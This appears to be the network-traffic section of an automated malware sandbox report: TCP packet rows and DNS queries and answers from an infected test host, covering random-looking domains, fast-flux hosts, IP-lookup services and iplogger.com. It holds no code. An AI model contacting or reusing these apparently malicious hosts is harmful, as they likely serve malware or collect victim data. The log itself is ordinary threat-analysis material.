Oct 13, 2023 15:21:20.928220034 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.928491116 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.928536892 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.928558111 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.928606033 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.928622007 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.928662062 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.928690910 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.928734064 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.928802013 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.928844929 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.928973913 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.929016113 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.929083109 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.929122925 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.929135084 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.929176092 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.929208040 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.929250956 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.929538965 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.929582119 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.929583073 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.929622889 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.929651022 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.929692984 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.929796934 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.929852962 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.929867029 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.929912090 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:21.066795111 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:21.066884995 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:21.067007065 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:21.067025900 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:21.067044973 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:21.067054033 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:21.067065954 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:21.067084074 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:21.067084074 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:21.067084074 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:21.067104101 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:21.067109108 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:21.067125082 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:21.067142010 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:21.067142010 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:21.067161083 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:21.067192078 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:21.067233086 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:21.067255974 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:21.067296982 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:21.067353010 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:21.067395926 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:21.067466974 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:21.067507029 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:21.067517996 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:21.067559004 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:21.067574024 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:21.067614079 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:21.067667961 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:21.067708969 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:21.067763090 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:21.067805052 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:21.067833900 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:21.067876101 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:21.067904949 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:21.067946911 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:21.068027020 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:21.068068981 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:21.068104982 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:21.068146944 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:21.068160057 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:21.068209887 CEST	49744	8000	192.168.2.5	49.12.118.151

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 13, 2023 15:20:29.252490997 CEST	192.168.2.5	1.1.1.1	0x9e6c	Standard query (0)	onualituyrs.org	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:20:31.522449017 CEST	192.168.2.5	1.1.1.1	0x2e8a	Standard query (0)	sumagulituyo.org	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:20:32.525368929 CEST	192.168.2.5	1.1.1.1	0x2e8a	Standard query (0)	sumagulituyo.org	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:20:33.541177034 CEST	192.168.2.5	1.1.1.1	0x2e8a	Standard query (0)	sumagulituyo.org	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:20:36.447987080 CEST	192.168.2.5	1.1.1.1	0x2e8a	Standard query (0)	sumagulituyo.org	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:20:37.118232965 CEST	192.168.2.5	1.1.1.1	0xb8e9	Standard query (0)	snukerukeutit.org	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:20:38.103667021 CEST	192.168.2.5	1.1.1.1	0xb8e9	Standard query (0)	snukerukeutit.org	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:20:38.834016085 CEST	192.168.2.5	1.1.1.1	0x88c6	Standard query (0)	lightseinsteniki.org	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:20:39.822160959 CEST	192.168.2.5	1.1.1.1	0x88c6	Standard query (0)	lightseinsteniki.org	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:20:40.837764978 CEST	192.168.2.5	1.1.1.1	0x88c6	Standard query (0)	lightseinsteniki.org	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:20:42.837847948 CEST	192.168.2.5	1.1.1.1	0x88c6	Standard query (0)	lightseinsteniki.org	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:20:45.482858896 CEST	192.168.2.5	1.1.1.1	0xad26	Standard query (0)	liuliuoumumy.org	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:20:46.494112968 CEST	192.168.2.5	1.1.1.1	0xad26	Standard query (0)	liuliuoumumy.org	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:20:47.493990898 CEST	192.168.2.5	1.1.1.1	0xad26	Standard query (0)	liuliuoumumy.org	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:20:48.977873087 CEST	192.168.2.5	1.1.1.1	0x76c9	Standard query (0)	stualialuyastrelia.net	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:20:55.481964111 CEST	192.168.2.5	1.1.1.1	0x621f	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:03.491168022 CEST	192.168.2.5	1.1.1.1	0xd674	Standard query (0)	alayyadcare.com	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:05.425057888 CEST	192.168.2.5	1.1.1.1	0x5a96	Standard query (0)	colisumy.com	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:05.429343939 CEST	192.168.2.5	1.1.1.1	0xdfc7	Standard query (0)	zexeq.com	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:05.784504890 CEST	192.168.2.5	1.1.1.1	0x5796	Standard query (0)	mikolyda.beget.tech	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:06.431646109 CEST	192.168.2.5	1.1.1.1	0xdfc7	Standard query (0)	zexeq.com	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:06.431646109 CEST	192.168.2.5	1.1.1.1	0x5a96	Standard query (0)	colisumy.com	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:07.447520018 CEST	192.168.2.5	1.1.1.1	0x5a96	Standard query (0)	colisumy.com	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:07.447520971 CEST	192.168.2.5	1.1.1.1	0xdfc7	Standard query (0)	zexeq.com	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:07.622010946 CEST	192.168.2.5	1.1.1.1	0xb701	Standard query (0)	hoffmanlevi.space	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:09.023678064 CEST	192.168.2.5	1.1.1.1	0x4d9f	Standard query (0)	montereyclub.org	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:11.001199961 CEST	192.168.2.5	1.1.1.1	0xd54d	Standard query (0)	loveperry.org	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:16.973577976 CEST	192.168.2.5	1.1.1.1	0x40e	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:19.361879110 CEST	192.168.2.5	1.1.1.1	0x6b63	Standard query (0)	iplogger.com	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:19.361879110 CEST	192.168.2.5	1.1.1.1	0xd7eb	Standard query (0)	iplogger.com	65	IN (0x0001)	false
Oct 13, 2023 15:21:19.362250090 CEST	192.168.2.5	1.1.1.1	0x3d36	Standard query (0)	clients2.google.com	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:19.362251043 CEST	192.168.2.5	1.1.1.1	0xa78d	Standard query (0)	clients2.google.com	65	IN (0x0001)	false
Oct 13, 2023 15:21:19.362508059 CEST	192.168.2.5	1.1.1.1	0xaac7	Standard query (0)	accounts.google.com	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:19.362770081 CEST	192.168.2.5	1.1.1.1	0x4a3a	Standard query (0)	accounts.google.com	65	IN (0x0001)	false
Oct 13, 2023 15:21:21.373357058 CEST	192.168.2.5	1.1.1.1	0x41a0	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:21.373358011 CEST	192.168.2.5	1.1.1.1	0xc94a	Standard query (0)	www.google.com	65	IN (0x0001)	false
Oct 13, 2023 15:21:38.066879988 CEST	192.168.2.5	1.1.1.1	0xcff9	Standard query (0)	wirtshauspost.at	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:39.073373079 CEST	192.168.2.5	1.1.1.1	0xcff9	Standard query (0)	wirtshauspost.at	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:40.088808060 CEST	192.168.2.5	1.1.1.1	0xcff9	Standard query (0)	wirtshauspost.at	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:22:04.311785936 CEST	192.168.2.5	1.1.1.1	0xf76d	Standard query (0)	h171008.srv22.test-hf.su	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:22:05.361733913 CEST	192.168.2.5	1.1.1.1	0xf76d	Standard query (0)	h171008.srv22.test-hf.su	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 13, 2023 15:20:29.420128107 CEST	1.1.1.1	192.168.2.5	0x9e6c	No error (0)	onualituyrs.org		91.215.85.209	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:20:35.433367968 CEST	1.1.1.1	192.168.2.5	0x2e8a	No error (0)	sumagulituyo.org		35.205.61.67	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:20:35.433419943 CEST	1.1.1.1	192.168.2.5	0x2e8a	No error (0)	sumagulituyo.org		35.205.61.67	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:20:35.433453083 CEST	1.1.1.1	192.168.2.5	0x2e8a	No error (0)	sumagulituyo.org		35.205.61.67	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:20:36.610085011 CEST	1.1.1.1	192.168.2.5	0x2e8a	No error (0)	sumagulituyo.org		35.205.61.67	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:20:38.265347004 CEST	1.1.1.1	192.168.2.5	0xb8e9	No error (0)	snukerukeutit.org		104.198.2.251	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:20:38.265907049 CEST	1.1.1.1	192.168.2.5	0xb8e9	No error (0)	snukerukeutit.org		104.198.2.251	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:20:44.290633917 CEST	1.1.1.1	192.168.2.5	0x88c6	No error (0)	lightseinsteniki.org		34.143.166.163	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:20:44.290657997 CEST	1.1.1.1	192.168.2.5	0x88c6	No error (0)	lightseinsteniki.org		34.143.166.163	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:20:44.290795088 CEST	1.1.1.1	192.168.2.5	0x88c6	No error (0)	lightseinsteniki.org		34.143.166.163	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:20:44.290808916 CEST	1.1.1.1	192.168.2.5	0x88c6	No error (0)	lightseinsteniki.org		34.143.166.163	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:20:47.831712961 CEST	1.1.1.1	192.168.2.5	0xad26	No error (0)	liuliuoumumy.org		34.143.166.163	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:20:47.831964016 CEST	1.1.1.1	192.168.2.5	0xad26	No error (0)	liuliuoumumy.org		34.143.166.163	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:20:47.831980944 CEST	1.1.1.1	192.168.2.5	0xad26	No error (0)	liuliuoumumy.org		34.143.166.163	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:20:49.141211033 CEST	1.1.1.1	192.168.2.5	0x76c9	No error (0)	stualialuyastrelia.net		91.215.85.17	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:20:55.646203041 CEST	1.1.1.1	192.168.2.5	0x621f	No error (0)	api.2ip.ua		172.67.139.220	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:20:55.646203041 CEST	1.1.1.1	192.168.2.5	0x621f	No error (0)	api.2ip.ua		104.21.65.24	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:04.455888033 CEST	1.1.1.1	192.168.2.5	0xd674	No error (0)	alayyadcare.com		213.6.54.58	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:06.696726084 CEST	1.1.1.1	192.168.2.5	0x5796	No error (0)	mikolyda.beget.tech		91.106.207.50	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:08.048896074 CEST	1.1.1.1	192.168.2.5	0xdfc7	No error (0)	zexeq.com		14.33.209.147	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:08.048896074 CEST	1.1.1.1	192.168.2.5	0xdfc7	No error (0)	zexeq.com		211.119.84.111	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:08.048896074 CEST	1.1.1.1	192.168.2.5	0xdfc7	No error (0)	zexeq.com		180.94.156.61	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:08.048896074 CEST	1.1.1.1	192.168.2.5	0xdfc7	No error (0)	zexeq.com		210.182.29.70	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:08.048896074 CEST	1.1.1.1	192.168.2.5	0xdfc7	No error (0)	zexeq.com		211.181.24.133	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:08.048896074 CEST	1.1.1.1	192.168.2.5	0xdfc7	No error (0)	zexeq.com		175.120.254.9	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:08.048896074 CEST	1.1.1.1	192.168.2.5	0xdfc7	No error (0)	zexeq.com		190.224.203.37	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:08.048896074 CEST	1.1.1.1	192.168.2.5	0xdfc7	No error (0)	zexeq.com		190.141.134.150	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:08.048896074 CEST	1.1.1.1	192.168.2.5	0xdfc7	No error (0)	zexeq.com		187.18.108.158	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:08.048896074 CEST	1.1.1.1	192.168.2.5	0xdfc7	No error (0)	zexeq.com		201.124.243.137	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:08.048947096 CEST	1.1.1.1	192.168.2.5	0xdfc7	No error (0)	zexeq.com		14.33.209.147	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:08.048947096 CEST	1.1.1.1	192.168.2.5	0xdfc7	No error (0)	zexeq.com		211.119.84.111	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:08.048947096 CEST	1.1.1.1	192.168.2.5	0xdfc7	No error (0)	zexeq.com		180.94.156.61	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:08.048947096 CEST	1.1.1.1	192.168.2.5	0xdfc7	No error (0)	zexeq.com		210.182.29.70	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:08.048947096 CEST	1.1.1.1	192.168.2.5	0xdfc7	No error (0)	zexeq.com		211.181.24.133	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:08.048947096 CEST	1.1.1.1	192.168.2.5	0xdfc7	No error (0)	zexeq.com		175.120.254.9	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:08.048947096 CEST	1.1.1.1	192.168.2.5	0xdfc7	No error (0)	zexeq.com		190.224.203.37	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:08.048947096 CEST	1.1.1.1	192.168.2.5	0xdfc7	No error (0)	zexeq.com		190.141.134.150	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:08.048947096 CEST	1.1.1.1	192.168.2.5	0xdfc7	No error (0)	zexeq.com		187.18.108.158	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:08.048947096 CEST	1.1.1.1	192.168.2.5	0xdfc7	No error (0)	zexeq.com		201.124.243.137	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:08.048979998 CEST	1.1.1.1	192.168.2.5	0xdfc7	No error (0)	zexeq.com		14.33.209.147	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:08.048979998 CEST	1.1.1.1	192.168.2.5	0xdfc7	No error (0)	zexeq.com		211.119.84.111	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:08.048979998 CEST	1.1.1.1	192.168.2.5	0xdfc7	No error (0)	zexeq.com		180.94.156.61	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:08.048979998 CEST	1.1.1.1	192.168.2.5	0xdfc7	No error (0)	zexeq.com		210.182.29.70	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:08.048979998 CEST	1.1.1.1	192.168.2.5	0xdfc7	No error (0)	zexeq.com		211.181.24.133	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:08.048979998 CEST	1.1.1.1	192.168.2.5	0xdfc7	No error (0)	zexeq.com		175.120.254.9	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:08.048979998 CEST	1.1.1.1	192.168.2.5	0xdfc7	No error (0)	zexeq.com		190.224.203.37	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:08.048979998 CEST	1.1.1.1	192.168.2.5	0xdfc7	No error (0)	zexeq.com		190.141.134.150	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:08.048979998 CEST	1.1.1.1	192.168.2.5	0xdfc7	No error (0)	zexeq.com		187.18.108.158	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:08.048979998 CEST	1.1.1.1	192.168.2.5	0xdfc7	No error (0)	zexeq.com		201.124.243.137	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:08.527757883 CEST	1.1.1.1	192.168.2.5	0xb701	No error (0)	hoffmanlevi.space		45.130.41.106	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:09.253623962 CEST	1.1.1.1	192.168.2.5	0x4d9f	No error (0)	montereyclub.org		172.67.196.133	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:09.253623962 CEST	1.1.1.1	192.168.2.5	0x4d9f	No error (0)	montereyclub.org		104.21.21.57	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:09.261127949 CEST	1.1.1.1	192.168.2.5	0x5a96	No error (0)	colisumy.com		187.18.108.158	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:09.261127949 CEST	1.1.1.1	192.168.2.5	0x5a96	No error (0)	colisumy.com		115.88.24.200	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:09.261127949 CEST	1.1.1.1	192.168.2.5	0x5a96	No error (0)	colisumy.com		123.140.161.243	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:09.261127949 CEST	1.1.1.1	192.168.2.5	0x5a96	No error (0)	colisumy.com		211.119.84.111	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:09.261127949 CEST	1.1.1.1	192.168.2.5	0x5a96	No error (0)	colisumy.com		211.53.230.67	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:09.261127949 CEST	1.1.1.1	192.168.2.5	0x5a96	No error (0)	colisumy.com		210.182.29.70	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:09.261127949 CEST	1.1.1.1	192.168.2.5	0x5a96	No error (0)	colisumy.com		211.171.233.126	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:09.261127949 CEST	1.1.1.1	192.168.2.5	0x5a96	No error (0)	colisumy.com		2.180.10.7	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:09.261127949 CEST	1.1.1.1	192.168.2.5	0x5a96	No error (0)	colisumy.com		123.213.233.131	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:09.261127949 CEST	1.1.1.1	192.168.2.5	0x5a96	No error (0)	colisumy.com		187.212.189.11	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:09.261162043 CEST	1.1.1.1	192.168.2.5	0x5a96	No error (0)	colisumy.com		187.18.108.158	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:09.261162043 CEST	1.1.1.1	192.168.2.5	0x5a96	No error (0)	colisumy.com		115.88.24.200	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:09.261162043 CEST	1.1.1.1	192.168.2.5	0x5a96	No error (0)	colisumy.com		123.140.161.243	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:09.261162043 CEST	1.1.1.1	192.168.2.5	0x5a96	No error (0)	colisumy.com		211.119.84.111	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:09.261162043 CEST	1.1.1.1	192.168.2.5	0x5a96	No error (0)	colisumy.com		211.53.230.67	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:09.261162043 CEST	1.1.1.1	192.168.2.5	0x5a96	No error (0)	colisumy.com		210.182.29.70	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:09.261162043 CEST	1.1.1.1	192.168.2.5	0x5a96	No error (0)	colisumy.com		211.171.233.126	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:09.261162043 CEST	1.1.1.1	192.168.2.5	0x5a96	No error (0)	colisumy.com		2.180.10.7	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:09.261162043 CEST	1.1.1.1	192.168.2.5	0x5a96	No error (0)	colisumy.com		123.213.233.131	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:09.261162043 CEST	1.1.1.1	192.168.2.5	0x5a96	No error (0)	colisumy.com		187.212.189.11	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:09.261194944 CEST	1.1.1.1	192.168.2.5	0x5a96	No error (0)	colisumy.com		187.18.108.158	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:09.261194944 CEST	1.1.1.1	192.168.2.5	0x5a96	No error (0)	colisumy.com		115.88.24.200	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:09.261194944 CEST	1.1.1.1	192.168.2.5	0x5a96	No error (0)	colisumy.com		123.140.161.243	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:09.261194944 CEST	1.1.1.1	192.168.2.5	0x5a96	No error (0)	colisumy.com		211.119.84.111	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:09.261194944 CEST	1.1.1.1	192.168.2.5	0x5a96	No error (0)	colisumy.com		211.53.230.67	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:09.261194944 CEST	1.1.1.1	192.168.2.5	0x5a96	No error (0)	colisumy.com		210.182.29.70	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:09.261194944 CEST	1.1.1.1	192.168.2.5	0x5a96	No error (0)	colisumy.com		211.171.233.126	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:09.261194944 CEST	1.1.1.1	192.168.2.5	0x5a96	No error (0)	colisumy.com		2.180.10.7	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:09.261194944 CEST	1.1.1.1	192.168.2.5	0x5a96	No error (0)	colisumy.com		123.213.233.131	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:09.261194944 CEST	1.1.1.1	192.168.2.5	0x5a96	No error (0)	colisumy.com		187.212.189.11	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:11.168042898 CEST	1.1.1.1	192.168.2.5	0xd54d	No error (0)	loveperry.org		172.67.213.185	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:11.168042898 CEST	1.1.1.1	192.168.2.5	0xd54d	No error (0)	loveperry.org		104.21.86.8	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:17.136127949 CEST	1.1.1.1	192.168.2.5	0x40e	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:19.524378061 CEST	1.1.1.1	192.168.2.5	0x3d36	No error (0)	clients2.google.com	clients.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 13, 2023 15:21:19.524378061 CEST	1.1.1.1	192.168.2.5	0x3d36	No error (0)	clients.l.google.com		142.250.72.238	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:19.524684906 CEST	1.1.1.1	192.168.2.5	0x6b63	No error (0)	iplogger.com		148.251.234.93	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:19.524902105 CEST	1.1.1.1	192.168.2.5	0xaac7	No error (0)	accounts.google.com		142.250.68.13	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:19.525363922 CEST	1.1.1.1	192.168.2.5	0xa78d	No error (0)	clients2.google.com	clients.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 13, 2023 15:21:21.535083055 CEST	1.1.1.1	192.168.2.5	0xc94a	No error (0)	www.google.com			65	IN (0x0001)	false
Oct 13, 2023 15:21:21.535444021 CEST	1.1.1.1	192.168.2.5	0x41a0	No error (0)	www.google.com		142.250.189.4	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:40.732553005 CEST	1.1.1.1	192.168.2.5	0xcff9	No error (0)	wirtshauspost.at		211.104.254.139	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:40.732553005 CEST	1.1.1.1	192.168.2.5	0xcff9	No error (0)	wirtshauspost.at		14.33.209.147	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:40.732553005 CEST	1.1.1.1	192.168.2.5	0xcff9	No error (0)	wirtshauspost.at		211.181.24.132	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:40.732553005 CEST	1.1.1.1	192.168.2.5	0xcff9	No error (0)	wirtshauspost.at		95.107.163.44	A (IP address)	IN (0x0001)	false
